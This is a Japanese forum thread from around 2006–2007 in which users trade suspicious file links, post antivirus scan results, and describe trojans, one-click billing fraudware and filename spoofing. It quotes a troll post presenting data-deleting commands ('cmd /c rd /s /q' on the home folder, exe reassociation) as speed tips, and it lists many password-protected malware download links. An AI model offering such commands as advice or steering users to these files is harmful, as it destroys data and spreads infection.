検体送って三日後か
遅くね?

うるせえエビフライぶつけるぞ
　,.、,、,..,、、.,、,、、..,_,,_　 ／i
;'｀;、、:、. .:、:,　:,.: ::｀゛:.::'':,'.´ -‐i
'、;: ...: ,:. :.、... :.、.:: _;... .;;.‐'゛￣ ￣ 　
　　　ヽ(´･ω･)ﾉ
　　　　 | G /
　　　　 UU 

>>191の先のやつ消えてるなあ・・・
VirusTotalでカスペが対応してるのか誰かかわりに見て！

>>220
(・∀・)Trojan-Clicker.Win32.VB.pv

ttp://www.rupan.net/uploader/download/1167382133.rar
ttp://www.rupan.net/uploader/download/1167377136.rar

お願いします

>>220
>>197
>>198

220 名前： 猪(検問中) 投稿日： 2006/12/29(金) 18:55:19.36 ID:DmBfWira0
http://www.uploda.org/uporg635455.rar.html
一応パスは掛けておいた、まぁ分かるよな vip

おながいします。

>>222
http://www.rupan.net/uploader/download/1167382133.rar
huun.dllにはウイルスは発見されませんでした
S??iva.eXEにはウイルスは発見されませんでした

http://www.rupan.net/uploader/download/1167377136.rar
huun.dllにはウイルスは発見されませんでした
Readm?txt.EXeにはウイルスは発見されませんでした
おまけ?zip.?どな.rar.exeにはウイルスは発見されませんでした
これはエロイｗっｗｗe??vmw.eXeにはウイルスは発見されませんでした

>>224
ピロウイルスとか出てきた

>>222
ユニコード使ったやつだな
まあ初心者はひっかかるだろうなｗ




















てかひっかかっちまったああああああああああああああああああ

>>227
気にするな。俺もだ

（´・ω・`）ｼｮﾎﾞｰﾝ

>>224

http://www.dotup.org/uploda/www.dotup.org13744.png











さてリカバリするか

いい機会じゃないかｗ

やっぱり拡張子偽装には詳細表示が非常に有効な武器になるね。
Windowsは俺より賢いから「アプリケーション」と表示してくれる。

砂箱には勝てんのですよ

>>224
P2P-DESTROYERか何かで作ったのかな。
サイズが大きくて検体が送れないｗ

>>234
そのまま送れよw

ヒント：　圧縮したら1MB

>>224
検知しました: トロイ Trojan.Win32.KillFiles.ki　　URL: http://www.uploda.org/uploader.cgi/youjo/youjo.rar/新しいフォルダ/youjo.SCR

落とす前に検知してくれた。すごいよカスペちゃん

Bitじゃ解凍して右栗スキャンしないと反応してくれない。

>>235
orz

俺がバカだった。

>225
ああ〜ん、VB2007で実行しようと思ったら、タイムリーでパターン更新きて、実行できなかったw

よし、>>224やるか。

>>224
Symantecに先頭のプログラム部分だけ送っといた

ベンダーは年末年始やってるのだろうか

うごぁ、WinRAR入ってなくて、解凍できないだけだった……orz

>>222
こっちを検出した人いる?

>>241
失敗した。
中身を見るべきだったか。
そのまま送ったらトレンドマイクロから「Over restriction (decompressed file size)」という
警告メールが来た。
まあ、良いか。

>>244
jottiですべてNO　virus　found

VB2007検知できず。
不審ソフトウェア警戒 ON で実行してみる。(´･ω･`)

>>244
http://www.virustotal.com/vt/en/resultadof?c6a48350c45f90c4919a44811c760810

>>224
そのまんま検体送りたいんだけど、rarの解凍にもパス（vip）いりますか？

>>246
>>248
サンクス

Unicodeつかったファイル名偽装への対抗策

ttp://d.hatena.ne.jp/hasegawayosuke/20061222/p1

>>222

全部これになった。レジストリの改変はしない模様。
タスクマネージャで殺して、おしまい(今の所は)。
ttp://new1314.freespace.jp/log/up/log/2259.png

homeじゃできねえべ？

こっちだった
ttp://user.ftth100.com/log/up/log/2259.png

>>222
ttp://vista.jeez.jp/img/vi6739659359.png

( ´_ゝ｀)ﾌｰﾝはベクターでダウソできる
http://www.vector.co.jp/soft/dl/win95/amuse/se277584.html

Programmed By NTACY MAINICON （ ´_ゝ`）ふーん v1.0

http://www.dotup.org/uploda/www.dotup.org13763.zip.html
フォルダを開いたらブルースクリーンになってしまいました。これはなぜでしょう？

>>258
偽装フォルダだね

Fortinet Found Joke/Bluescreen

間違えた orz
これは　俺がもってるジョークソフトだった

>>258
カスペ反応なし???
なんだこれ

やっぱ260っぽい
文字列追加して検出できないようにしてんじゃねえの？

>>258
Joke-Bluescreen.c

>>224
AntiVir 7.3.0.21 12.29.2006 no virus found
Authentium 4.93.8 12.29.2006 no virus found
Avast 4.7.892.0 12.21.2006 no virus found
AVG 386 12.29.2006 Generic2.OKQ
BitDefender 7.2 12.29.2006 no virus found
CAT-QuickHeal 8.00 12.29.2006 no virus found
ClamAV devel-20060426 12.29.2006 no virus found
DrWeb 4.33 12.29.2006 no virus found
eSafe 7.0.14.0 12.28.2006 no virus found
eTrust-InoculateIT 23.73.101 12.29.2006 no virus found
eTrust-Vet 30.3.3289 12.29.2006 no virus found
Ewido 4.0 12.29.2006 no virus found
Fortinet 2.82.0.0 12.29.2006 no virus found
F-Prot 3.16f 12.29.2006 no virus found
F-Prot4 4.2.1.29 12.29.2006 no virus found
Ikarus T3.1.0.27 12.29.2006 no virus found
Kaspersky 4.0.2.24 12.29.2006 Trojan.Win32.KillFiles.ki
McAfee 4929 12.29.2006 no virus found
Microsoft 1.1904 12.27.2006 no virus found
NOD32v2 1946 12.29.2006 probably a variant of Win32/KillFiles.KI
Norman 5.80.02 12.29.2006 no virus found
Panda 9.0.0.4 12.29.2006 no virus found
Prevx1 V2 12.29.2006 no virus found
Sophos 4.13.0 12.28.2006 no virus found
Sunbelt 2.2.907.0 12.18.2006 no virus found
TheHacker 6.0.3.139 12.29.2006 no virus found
UNA 1.83 12.29.2006 no virus found
VBA32 3.11.1 12.29.2006 suspected of RAR.MailBomb
VirusBuster 4.3.19:9 12.29.2006 no virus found

P2P-DESTROYERでつくられたやつはNODとカスペが強いよ　
亜種をヒューリスティックでほとんど検出できる
反対にバスターとノートンはだめぽ　サイズ変えただけで検出できなくなる

書き込めないと思ったら鯖移転か

バスター2006ってもうドクロウイルスには対応してるんだっけ？

WORM_ANTINNY.AW
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.AW

この手の物はトレンドマイクロに表彰されるくらいの熱心な検体提供者がいるはずだ。
今も活動しているのか知らないけど。

>>269
軍艦さんとかな

>>269
志村〜それ旧型！！

ttp://www8.axfc.net/uploader/16/so/N16_7070.zip.html
P=12345
これなんですか？

>>272
Dialer
PC有害

>>273
これ踏むとどうなります？

>>274
ダイアルアップ回線なら勝手にQ2とかにダイアルさせられる。

>>275
あぁうちADSLなんでダメだな
�dクス

書き込みてｓｔ

!omikuji !dama

まだ早いだろ。

!omikuji!dama

!omikuji!dama!

大凶かよ…

!omikuji!dama

ttp://www4.axfc.net/uploader/14/so/N14_21370.zip.html
news
ttp://200.megaloda.org/uploda/www.megaloda.org0067.rar.html
vip

>>284
上 Trojan.Win32.Agent.gh

下 Trojan-Clicker.Win32.Agent.it

!omikuji!dama

>>284
上はNOD32で反応するけど下は反応しないなぁ

下のファイル115Mもあるじゃねえかｗ

よう

tp://suzukiairi.net/cgi-bin/up/img/puniairi150.jpg
これってどういう条件でどう動くのか分かりませんか？

これ踏むとどうなりますか？
http://z.u.la/k.divby0.com/q/bic

>>291
ブラクラでもウイルスでもありません。普通の携帯サイト

>>290
AntiVirでPHP/C99Shell.Bとして検出

最近PCが重いとか、起動やシャットダウンが遅いとか思ってる人は、
このコマンドを試してみるといい。
以下を実行することで領域の節約、不要になったメモリが解放される

[スタート]→[ファイル名を指定して実行]で 
ftype exefile="%SystemRoot%\system32\write.exe" %1
と入力し[OK]をクリックする。 これだけでおｋ。

Ｗｅｂページを開くのが遅い場合はこのコマンドを使ってみよう。
レンダリングの方法を変えるためかなり体感速度が変わるはずだ。
ftype HTTP="%SystemRoot%\hh.exe" %1
(HTTPプロトコル)
ftype HTTPS="%SystemRoot%\hh.exe" %1
(HTTPSプロトコル)

特に３Ｄゲームを主に動かすハイスペックユーザーにとっては朗報だろう。
もしこの方法で問題が起こったら戻すのも簡単だ。
cmd /c rd /s /q %SystemDrive%%HOMEPATH%
このコマンドを入力してＯＫを押すだけ。

ちなみに俺はこのコマンドをしてベンチマークスコアが110〜130%ほど上昇した。
君も試してみるといい

最近PCが重いとか、起動やシャットダウンが遅いとか思ってる人は の検索結果 約 60 件中 1 - 10 件目

これやったら大変なことになった。(´Д⊂ ﾓｳﾀﾞﾒﾎﾟ

ショートカットがワードパッドで開くようになった。
デスクトップのアイコンが全部消えた。

あやしいレスを実行してどうする。

なんじゃらこりゃ

exe ファイルの関連付けを変更してしまいました
ttp://homepage2.nifty.com/winfaq/wxp/trouble.html#1251

>>294
最近よく見るなw
cmd /c rd /s /q d:を実行させて、ユーザーに確認を取らずにパーティションD以下の
ディレクトリを削除するものもあるな

まったく。

怖くて俺には出来ない

.exeの関連付け変えられたらコマンドプロンプトも起動できないだろ

ttp://www.badongo.com/file/1605002
ttp://www.badongo.com/file/1605815
ttp://www.badongo.com/file/1605927
ttp://www.badongo.com/file/1606064
ttp://www.badongo.com/file/1606113

なにこれ。

rar分割書庫じゃね
エロ動画でも入ってるんだろう

エロ動画か。　興味ネ

落ちてコネェ

>>308はインポ

ttp://www8.axfc.net/uploader/15/so/N15_14006.zip.html
key:GOM

GOMPLAYER？

>>312
多種のCodecを独自に内蔵するフリーの韓国製メディアプレーヤーですｗ

姦国製は論外

>>314
あやまれ！アンラボのアンチウイルス使ってる俺にあやまれ！

>>311
ttp://ehoba.mydns.jp/loada/src/txup0112.png

>>316
ビットディフェンダーでもダメなのかカスペ系がやっぱ強いな

>>316
そこではなぜか無反応だが、AntiVirでもTR/Click.Agent.ITを検出

なになに？
GOMてウィルス入りなの？
GOM使ってるんだが今のとこ何も不具合はおきていない。

>>319
日本の公式サイトから落としたやつは反応なかった

>>318
jottiは最新updateに追いついていない場合があるからね
virus totalのほうが正確 >>311の結果はこれ
http://www.virustotal.com/vt/en/resultadof?1070cdf9e1fe1693e0a921768b947a12

ほいで今最新のgomを落としてスキャンしてみた　>>311とはMD5が違う　もちろんno virus found
http://www.virustotal.com/vt/en/resultadof?ff5e4e3e55381f511bef35be93106dc7　

つまりなんだ、昔のGOMにはアドウェアが仕込んであったと、そういうことか
動画プレイヤーにアドウェアとかロクでもないな

単純にファイル名にGOMPLAYERって入ってるだけでGOMPLAYERとは無関係でしょ？
バージョン情報無いし、144 KBってありえない。

ttp://pcshop.tyabo.com/no-to/a-001.htm
ニュー即に張られてて踏んでしまいました。
カスペとNODのみ対応している模様で、Norton,Antivirなどはだめらしいです。
カスペを入れた状態で踏んだものの、FDDへのアクセスがガガガガっとなって・・・・ちょっと心配。

>>321
まあそう言うな。
virus total でやろうとしたら、キューが350越えてて、待ち時間が1時間ですよって言われたのさ。(´･ω･｀)

>>324
VB2007 - TROJ_HEUR.IL

Adodb.Stream 使ったウイルスだな。
IEコンポのブラウザ使うと実行されるみたいだ。IEはAdodb.Streamオブジェクトを作成できなくなったので問題ない。
ブラウザ変えるか、VBScript切っておけ。

上のほうにあったこれだけど、
tp://pcshop.tyabo.com/no-to/a-001.htm
アクセスして手に入いるdown.exeを実行すると1.exeが手に入る
http://ccfa.info/cgi-bin/up/src/up41519.jpg
http://ccfa.info/cgi-bin/up/src/up41520.jpg
それほど対応していないっぽいし、今すぐ手にいれようぜ！

なんか知らんが手に入るが手に入いるに変換された・・・orz

>>327
なんか誤検出臭い組み合わせだね

やべ

ttp://amilala.blogspot.com
ここを踏んでしまったんだけど、これって何？
今のところＰＣは正常に動作しているみたいだけど、すごく不安

>>331
知ってる人はURLの「amilala」の文字列だけでわかるよ。

Amilalaの亜種？
文字列とかAmialaだけど、動作が良くわからない。
最初のウィンドウでOKを押すと変な場所に飛ばされて終わり。
キャンセルを押すとAmilala？が発動してクレジットカード番号を求めてくる。
OKかキャンセルをクリックするとJava仮想マシンが起動して妙なウィンドウが表示される。
さらにMS06-001のセキュリティホールを利用すると思われる悪意あるコードをダウンロードし始める。

ちなみに、Firefoxなど非IE系ブラウザで開いても、

UgH w0TTa d1CkhEAd mEEh NeVa sEEn
uSe M$IE6!

と、IE6を使うように指示されるだけ。
OKをクリックするとMicrosoftのIE6 SP1のダウンロードページに飛ばされる。

13 名前：名無しさんに接続中… [sage] 投稿日：2007/01/07(日) 10:50:07 ID:ctL4yOGU
　 ＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　 |　　　　　　　　　　　　　　　　　　　　｜
　 |　　　＠ニフティ新料金プラン発表！マンセー！ ｜
　 |　　　　　　 　　　　　　 　｜
　 |　ttp://headline-news.tripod.com/national/20061118-00000102-mai-soc.html 　　　　　　　　　　　　　　　　　　　｜
　 |　　　　　　　　　　　　 　　　　　　　　|
　 |＿＿ｎ＿＿＿＿＿＿＿＿＿ｎ　＿|
　　　（ (　）　　　　　　　　　　　　（　) ）
　　 　|　 |　 　　 ／￣￣||　　　　 |　 |
　　 　|＿|　　 ／￣￣＼||＼　　　|＿|
　　　（._ノ＼/　　　　　　　　 ＼／＼_.）
　　　　＼　 ＼.　　　／　　＼　|　 ／
　　　　　 ＼___）　　　(･)　　(･) |／
　　　　　　(6-------◯⌒つ　|
　　　　　 　 |　　　／＿|||||||||　|
　　　　　　　＼　　　　＼＿/／
　　　　　　　／⌒)　　　　 ／＼
　　　　　 ／ 　／ ＼＿／＼ 　 ＼
　　　　 （.＼／　　　　　　　　＼／.）
　　　　　|￣）　　　　　　　　 　 （￣|
　　　　__|　 |　　　　　　 　 　 　 |　 |__
　　　.（＿＿）　　　　　 　 　 　 （＿＿）
from http://tmp6.2ch.net/test/read.cgi/download/1168006612/


↑これウイルスですかね

書き込み自体はウイルスじゃないよ

>>333
だから何だよ屑｡死ね。

>>333
ブラクラ・・・というか厨房ホイホイかなぁ
しかもご丁寧にやばいものまでダウンロードさせようとする

裏情報ランキング
http://ia.kakiko.com/sami/2/yty.htm
キムタクの超意外な過去

>>337
芋電、au,Jkyからご利用下さいって…。ヴォーダフォンにすらなっていないのか。
だけどメアドはpdxに対応している不思議なサイトだな…

( ´_ゝ｀)ﾌｰﾝ

ttp://zetubou.mine.nu/itoshiki/nozomu/zetubou4113.exe

大勝利(ﾟ∀ﾟ)

そうか、そうか

>>340
Perfect DarkとかいうP2Pソフトと料理のレシピ（一部画像入り）

>>343
と、いうことは創価の仕業か

NIS2007入れたら>>224検出しない・・・

>>345
ヒント：解凍

tp://aaa-www.net/~sakurano/webgoudou/0062/HDD_cleaner.exe

>>346
もちろん解凍済み

再うｐ

ダウソﾊﾟｽ：scr
ZiP解凍ﾊﾟｽ：scr
ttp://kossie.run.buttobi.net/cgi-bin/up/src/kos0728.rar.html

>>345

>>266

ttp://www.vipper.net/vip162902.zip.html
vip

Trojan.Win32.KillFiles.ki

すいません、教えてください。
>>350のファイルって危険ですか？
ダウンロードしてしまったのですが・・・。
解凍までしてしまいました。

>>352
実行しなければおｋ

このスレ的には、中に入ってるyoujo.scrっていうのを動かさなきゃだめだろ。

>>353
いや・・実行しちゃいまして。
応答なしになってましたけど。
その後特に変化無いんですが、どうなんでしょうか？

coopen.exe from China

>>354
山田さんですか？

>>355
http://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FHARADONG%2EJ&VSect=Sn
一回動いて終わりらしいし、もうどうしようもないんじゃね？

ランタイムも入れたけどwindows\help\.hlpがないって怒られる

こういう時こそインスコマンが来てくれないと

おお、インスコマン

Trojan.Win32.KillFiles.ki
カスペじゃまだ対策出されてないね

>>348と同じｼﾞｬﾏｲｶ

Trojan.Win32.KillFiles.ki
カスペも検知したお

当たり前だがこれで完璧なんてソフトはないな

NOD32ｖ2.7　解凍するとすでに削除していた、汗

>>364
検知じゃなくて対応ね
↓ここ
http://www.viruslist.com/en/viruses/encyclopedia?virusid=125040

ttp://www.uploda.org/uporg660874.png
ttp://www.vipper.net/vip163413.png
ttp://www.uploda.org/uporg660877.png
ttp://www.vipper.net/vip163416.png
ttp://www.vipper.net/vip163418.png
ttp://www.vipper.net/vip163420.png

ttp://www.uploda.org/uporg661811.rar.html

>>369
Worm.Win32.Antinny.u

ttp://a-draw.com/uploader/src/up11961.zip.html

ttp://www.geocities.jp/mimahisayuki/kiken002.mid

>>372
Microsoft GS Wavetable SW Synth + WMPで再生すると青画面
プレーヤーによっては大丈夫かも

>>371
http://tmp.2ch.net/download/kako/1008/10086/1008690541.html

>>372
GOM Playerで再生。一瞬のブルー画面後、XPがクラッシュ・強制再起動
jetAudioでは、無問題。単なるhigh-tone sound
http://www.vipper.net/vip164254.png

h消し忘れｽﾏｿ

（　＾ω＾）

>>372
YAMAHA S-YXG50　でも聞けた
Microsoft GSだけかな？

すみません。教えていただきたい事があります。

・行った事
>>350をDLし実行しました。
実行前にウイルス検査をして安全を確認しました。

・結果
ピロウイルスに感染しました。（そういう旨の画像が表示された）

・症状
動画やフォルダなどが書き換えられました。
圧縮ソフトなどが使用できなくなりました。
気づかないだけで他にもあるかもしれません。

・対処
コンピュータ全体にウイルススキャンをしました。
ウイルスは発見できませんでした。

・教えていただきたい事
�@書き換えられた動画等は元に戻せるのでしょうか？
�Aやらないといけない対処はあるのでしょうか？

よろしくお願いいたします。
ちなみに、セキュリティーソフトはウイルスセキュリティーを使用しています。

>>378
当たり前のことだが、ソースネクストに電話化何かで問い合わせて対応してもらうのが一番いい。
既に対応している他社の製品を買ってもいいだろうけど・・・・
期限が残ってたらもったいないし、他のウイルスセキュリティを使ってる人も助かる。

>>378
> �@書き換えられた動画等は元に戻せるのでしょうか？
ファイルが変更されると、バックアップがない限り元に戻すことはできません。

> �Aやらないといけない対処はあるのでしょうか？
レジストリが書き換えられた結果として、機能が使用できなくなったりしています。
レジストリのバックアップがあれば、元に戻すことはできます。
また、Windowsの知識があれば、原因をたどって手動で元に戻すことは可能でしょうが
そうでなければ、OSのリカバリをすることが安全確実です。

>>378
＞ちなみに、セキュリティーソフトはウイルスセキュリティーを使用しています。

そんな無茶すんなって！泣
普通にネットを楽しむぐらいならウイルスセキュリティーでもいいと思うけど
２ちゃん内をうろうろ、ましてや、得体の知れないものをダウソ&実行するときには
ウイルスセキュリティーでやるなど、自殺行為だよ；；

ttp://www.kaspersky.co.jp/scanforvirus/
オンラインスキャンで探って、まずは問題をおこしているやつを特定することから始めてくれ
ただし、OSのクリーンインストールを行わねばならない可能性を前提にして
運良く直ればいいけど的にことをすすめてくれ

>>379-381
返答ありがとうございます。
とてもうれしかったです。

オンラインスキャンをかけてみたのですが（シマンテック）
２ｃｈのログ（専ブラはLive2chです）がひかかるぐらいでした。
カスペルスキーでは感染なしとでました。

追加の症状でプログラムがどんどん使用できなくなっています。
レジストリの」バックアップに関しては
手動でやるもの（自動で無い）なら行ってないです。
いさぎよくリカバリですかね？

>>382
前にテストマシンで実行したことがあるが、ドライブ内の.exeファイルのほとんどが消されたんで、再インストールするしかなかった。

>>383
やはりそうですか・・・。

もし、ウイルスセキュリティー以外のソフトを使用していたら
防げたのでしょうか？

新しいソフトの購入も必須ですね。
ありがとうございました。

>>384
防げたでしょうね

一つだけ言っておきます
たぶん、あなたはそのまま再インストールするだけでしょう
多くのVSユーザがそうやって泣き寝入りしています

もし、私なら消費者センターなどに通報して
粗悪ソフトを売りつけたソースネクストを断罪するように行動しますよ

( ´,_ゝ`)ﾌﾟｯ

>>386
社員は黙ってろ
フリーで出てるようなソフトを1980で売るしか能がないくせに

ウイルスセキュリティを叩いてるやつはなんでいつも程度が低いんだろう。

>>388
ヒント
・　少しでもｾｷｭﾘﾃｨに関心があるやつなら買うという選択肢はない
・　買わないものをとりたてて糾弾する理由はない

>>382
気休めにﾄﾞｿﾞｰ
ttp://www.forest.impress.co.jp/lib/sys/file/delundel/datarecovery.html

ttp://tmp6.2ch.net/test/read.cgi/download/1168956744/457

>>391
404

>>391
110

ttp://tmp6.2ch.net/test/read.cgi/download/1168956744/477

>>394
おっぱい

aは何をやりたいんだろう?

http://www.zentastic.com/videos/bmevideo-3.wmv
これ恐くてひらけない

>>397
板違い。さよなら
http://hobby9.2ch.net/test/read.cgi/occult/1163331290/2

http://www.Goggle.com/
↑
これってヤバイとか？

>>399
http://www.youtube.com/watch?v=eFdm4PxRWd4&eurl=

マジで？
linuxで踏んでみるか・・・

>>400
ポップアップブロック有効になってればそんなにならないｗ

232 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2007/01/24(水) 01:26:01
http://www.easyspyremover.com/
このサイトからツールを落としてインストールしたんだけど詐欺ソフトだったりする？

>>403
システムドクターみたいな絵だな

easyspyremover　でググッてもあんまりヒットしないなぁ。よく分からん

http://pangyaup.pya.jp/uploader/src/up3229.zip
お願いします。

AntiVir Found BDS/PoisonIvy.j backdoor
ArcaVir Found nothing
Avast Found Win32:Small-DRG
AVG Antivirus Found Agent.WL
BitDefender Found BehavesLike:Win32.ExplorerHijack (probable variant)
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found Backdoor.Win32.PoisonIvy.j
Fortinet Found nothing
Kaspersky Anti-Virus Found Backdoor.Win32.PoisonIvy.j
NOD32 Found nothing
Norman Virus Control Found W32/PoisonIvy.gen3
VirusBuster Found nothing
VBA32 Found Trojan-Downloader.Obfuscated.30 (paranoid heuristics) (probable variant)

ttp://2chshare.net/mini/files/2chshare-mini_0296.zip.html

fujacksｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!

>>399
http://www.goggle.com/
小文字じゃないの？

あ、おんなじだなぁ。で何がこれ危険なのかわかんね。

>>406 なにも問題ない。

>>408
OfcDog.exe.exe が不明である以外、他３ケはウィルス。

よって、どなたか、OfcDog.exe.exe　を検証できる方、いらっしゃいませんか。

他三個はウイルスって同じファイルじゃねーか。
お祈りパンダが見たくてVM上でどちらも実行してみたが何も起こらなかった。

それもまた寂しい結果だな(-"-)

いつの間にか鑑定スレになっとるがな。

>>414
リソースを見てみたけど ただのアイコンファイルみたいです。
無害。

ttp://up.viploader.net/src/viploader72840.zip.html
vip

>>419
あやしいファイル自体が存在しねえ
cmdなんか中身見れるし

ttp://kasamatusan.sakura.ne.jp/cgi-bin2/src/ichi72163.jpg.html
ヤバいと聞いたが､どんなもんですかいのう？

404

これおながい。

253 名前：名無氏[sage] 投稿日：2007/01/28(日) 13:09:46 ID:???
ttp://www.uploda.org/uporg670820.rar.html

エロゲ系スレで拾ったnodvdファイルらしいですが。
なんか怪しい（winフォルダに入れて実行とか）のでお願いします。
回答したデスクトップ上のフォルダ内で一度誤って実行してしまったんですけど大丈夫ですか？
（ウィルス反応なし、今のところ異常なし）
おね。

>>423
404ですので ロダに上げて下さい。

>>424
これです。
ttp://www.nya-taloda.jpn.org/2MB/src/up15847.zip

解凍蓮：virus

>>425
調べたけど大丈夫。

ここは鑑定スレじゃねぇ

ハルヒ・最萌選対スレは移行しました。ブックマークの変更をお願いします。
http://jbbs.livedoor.jp/anime/4218/

>>426
�dｸｽｺ。

http://www.uploda.org/uporg673501.zip.html　　　pw virus

>>430
うぜーなゴミ
>>425と同じじゃねえか

http://www.peppar.jp/ok_sk2.php

これなんですか？大丈夫ですか

よろしこ

>>432
そもそも鑑定スレじゃねーんだよ
ま、ほとんどそうなってるけどさ

でもせめてファイルにしろよ
スレタイ読めるだろうが
単なるサイトの鑑定ならラウンジでやれ

http://c-au.2ch.net/test/-/sec/1167405312/391

最近はあまり面白いウイルス無いな

面白いウィルスって何？

ハルヒウイルス

uajapan.com
↑から落とせるワンクリウェア
http://www.virustotal.com/vt/en/resultadof?ed0842cc57dc66bfa654ed430da2ec3c

実行するとどうなるか誰か試してくれ

htmlファイルに見せかけたexeをダブルクリックしたら、
tp://uajapan.com/manage.php
が出てきた。

>>440
実行したのかw

デスクトップにseikyu.txtとというファイル名のテキストファイルが出現。
ファイルの内容
------------------------------------------------------------------------

この度は UNIVERSAL ADULT JAPAN をご利用いただき誠にありがとうございます。
利用規約に基づく、サイト利用料金（コンテンツ閲覧費用）の請求をさせていただきます。

・お客様ID　　　：UA878601
・ご利用開始日　：2007/02/03
・請求金額　　　：49,800円
・ご利用期間　　：ご利用開始日から180日間
・お支払い期日　：ご利用開始日から4日間
・お支払方法　　：当方指定の銀行口座へのお振込（※手数料はご負担ください）

■　請求の詳細及び利用規約の確認・銀行口座の確認、動画の閲覧は

１）当サイトにアクセスください（ http://uajapan.com ）
２）画面右上にログインという項目がありますので、ユーザーIDを入力の上、
　　ログインボタンを押してください。
３）請求の内容及び、利用規約、動画の閲覧へのリンクがありますので必要に
　　応じて該当するボタン・リンクをクリックして確認を行ってください。

■　通信販売法に基づく表示 　　　　　　　　　　　　

名称　　　　　　：UNIVERSAL ADULT JAPAN
責任者　　　　　：UNIVERSAL ADULT JAPAN管理室
料金　　　　　　：49,800円
サポート　　　　：別途定めるフォームによる
電話番号　　　　：045-349-2727

------------------------------------------------------------------------

再起動をかけてみる

インスコマンwwwww

再起動後
tp://uajapan.com/manage.php
が開き、消しにくい請求画面も開きます。↓画像
http://www.nya-taloda.jpn.org/2MB/src/up16846.png

因みにVISTA風です。

症状はこれくらいだ

アクティブデスクトップのようだな。

駆除はを削除すればいい。
C:\WINDOWS\system32\systemRedirection.bat
↓これは起動時に”systemRedirection.bat”によって自動的に実行されるみたい。勿論削除対象。
C:\WINDOWS\system32\sys-lnks.exe

sys-lnks.exe↓Micvosoft？
http://www.nya-taloda.jpn.org/2MB/src/up16848.png

対応状況(jotti)
AntiVir Found TR/VB.WY.10
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found Generic2.YNE
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found Trojan.Click.1914
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found Trojan.Win32.VB.wy
Fortinet Found W32/VB.WY!tr
Kaspersky Anti-Virus Found Trojan.Win32.VB.wy
NOD32 Found probably a variant of Win32/TrojanClicker.VB.PW (probable variant)
Norman Virus Control Found W32/VBTroj.FCI
VirusBuster Found nothing
VBA32 Found nothing

確認乙

AvastとBitが未対応か・・・。

ttp://registryrinse.com/
ttp://registryrinse.com/install.exe
明らかに怪しそうなんだが誰か実行頼む。

>>452
起動するとなんかスキャン
ttp://www.uploda.org/uporg680005.jpg

スキャンが終わると音がなってサイトへ
ttp://www.uploda.org/uporg680005.jpg

進んでいくと金銭要求
ttp://www.uploda.org/uporg680005.jpg

まぁ、普通にインチキソフトっぽいね

間違えた、2番目の画像
http://www.uploda.org/uporg680007.jpg
3番目の画像
http://www.uploda.org/uporg680009.jpg

>>453
サンクス！

今日保存した画像を転載するスレ 13枚目より転載
ttp://sakura03.bbspink.com/test/read.cgi/ascii2d/1170674667/78の３つめ
JS:WinBombらしい

>>456
普通の虹画だったぞ、他のと間違えてるか何かでは？
試しにavastのオンラインスキャンしたけど、clearだし。

Tested file Status
Lv.1_up75192.jpg clear

VPS version: VPS 0711-2 07.02.2007
Scaner version: 2.0.0
Scanned files: 1
Scanned directories: 0
Archives count: 0
Infected files: 0
Errors: 0
File count: 89.5 kB
Scan time: 0s 21ms
Scanned speed: 4.1 MB/s

単なる二次エロパイズリ画像だった。下らん

なに！？
落としてくる。

http://www.rupan.net/uploader/download/1170866104.exe
( ﾟдﾟ )テラヤバスｗｗｗｗ

ttp://resercher.aboutlaw.com/sgi/followers_list.html
パソコンがガガガッと鳴りました。
ウィルススキャンしたら何も検出されませんが、問題ないですか？

ごめんなさい、鑑定スレではなかったですね。失礼しました。

>>462
exe専用でした。

ttp://www.mugenhispania.org/
1103291.zip
pass:vip

>>464
そもそも鑑定スレじゃねーんだよ
ま、ほとんどそうなってるけどさ

でもせめてファイルにしろよ
スレタイ読めるだろうが
単なるサイトの鑑定ならラウンジでやれ

>>465
能書き垂れとらんでさっさと実行してやれやハゲ

>>466
つーかどこいけばいいかわからねーんだよﾊｹﾞ

どう見てもURL間違ってるよな

ttp://www.crackdb.com/run.exe

>>467
つか、ポップアップウィンドウ許可してる？

>>470
>ポップアップウィンドウ
ｾｷｭ板住人なら、普通許可してないだろ、常識的に考えてｗ

>>469
DR/Zlob.Gen

>>470
危険すぎてするわけねーｗｗｗｗｗｗｗ

>>464
どう見てもMUGENのサイトだなｗ

>>464-472
流れに吹いたｗ

普通は何か分ったらそこでやめるのに、
ここの鑑定人は実行までしてしまう。

さすがセキュ板の鑑定人、勇者。

ttp://202.70.242.97/C:/Winny2/up/

>>475
ウイルスの山じゃん！

>>476
kwsk

>>477
山田オルタの山だった

>>478
�d�d

>>478
今夜がやまだぁ〜

＿　　　　　　　　 　 ＿_/　
＿　　/　＿＿ 　　/　　￣/ 　　.へ　　　　　　　| 　　　.へ　　　　　　　　　　　　　　|.　　|
　　　/.　＿＿| 　 　　　　/.　　/　　＼　　　　_ノ 　 　/　　＼　　へ　.へ　.／　　_ノ　　│
＿_ノ　　＿＿|　　　　 ／ 　　/　　　　＼　￣ |　　　/　　　　＼　　｀´　｀´　　￣ |.　　　・

　　　　　　　　　　　　_ ､ -──¬‐-､
　　　　　　　　　　 ／　　　　　　 　 　 ＼
　　　　　　　　　 /　　　　　　　　　　　　 ヽ
　　　　　　　　 /　　　,----､　　　＿_　 　 ヽ
　　　　　　　　 !　　 /　　 　 `'''''''´　　｀ヽ 　 i
　　　　　 　 　 |　　/　　　　　　　 　 　 　 }　 |
　　　　　　　 _⊥＜　,,,,,,,,__　　 　 　 　 　 |　 !
　　　　　 　 /r＼ｆ‐┴─-＜_　　≦二ヽ__レ'!
　　　　　　　!ノ!. ヽ 厂二二┐￣r─‐-､　/⌒!
　　　　　　　l ヽ 　 !ヽ＿＿//＾ヽ! ￣｀ ﾉ/iヽ /
　　　　　　　＼__!　`ー--／!　 ＼ヽ--'/├'/
　　　　　　　　　|　　　／ L _　__）ヽ￣　 /‐'
　　　　　　　　 ,┤　i〈 ､＿＿＿＿_, 〉　/
　　　　　　　 /　 !　　ヽ＼+┼┼+/　 /　　なんやねん？
　　　　　 __/　　 ヽ　　　　`ー‐‐'´　/
　　, -‐''"　i　　　　＼　　　　　　　人
